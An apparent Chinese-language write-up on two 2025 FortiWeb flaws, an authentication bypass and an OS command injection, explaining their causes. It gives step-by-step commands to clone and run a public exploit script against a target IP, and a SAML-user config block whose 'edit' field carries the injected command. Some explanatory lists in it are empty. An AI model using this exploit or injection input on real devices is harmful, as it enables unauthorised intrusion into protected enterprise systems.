Fortinet FortiWeb 是一种 Web 应用防火墙(WAF)设备, 广泛部署于企业系统中,用于保护 Web 应用免受常见威胁。
由于 FortiWeb 通常位于核心防护层, 与身份验证或操作系统命令执行相关的漏洞 可能对后端的整个基础设施造成严重影响。 2025 年,FortiWeb 上公布了两项严重漏洞:
CVE-2025-64446 – 通过相对路径遍历绕过身份验证
CVE-2025-58034 – 已认证上下文中的操作系统命令注入
CVE-2025-64446 源于 FortiWeb 在应用身份验证机制之前,对访问路径的处理与检查不够严格。
具体来说:
这一缺陷导致某些管理端点 可能无需有效身份验证即可被访问。
CVE-2025-58034 是由于 FortiWeb 在调用操作系统命令时,对用户输入数据处理不安全所致。
主要原因包括:
该漏洞需要已认证的上下文, 但由于涉及命令执行,仍然具有很高的风险级别。
git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034 cd CVE-2025-64446_CVE-2025-58034
Python 虚拟环境(venv)用于为每个项目创建独立的工作环境,将依赖库与系统主 Python 隔离。这有助于避免库版本冲突,确保工作环境的稳定性,并减少对系统的影响。
python3 -m venv venv source venv/bin/activate
pip install -r requirements.txt
python exploit.py <target_ip>

config user saml-user
edit "<YOUR COMMAND>"
set entityID http://foo
set service-path /foo
set enforce-signing disable
set slo-bind post
set slo-path /foo
set sso-bind post
set sso-path /foo
end
CVE-2025-58034 漏洞源于 FortiWeb 对某些配置字段中的输入数据缺乏严格管控,尤其是通过以下命令传入的值: edit "" 问题: 该值被作为配置字符串处理 随后被传入内部操作系统命令 未对特殊字符进行充分过滤或转义 这导致配置数据可能直接影响所执行的操作系统命令,从而引发操作系统命令注入漏洞。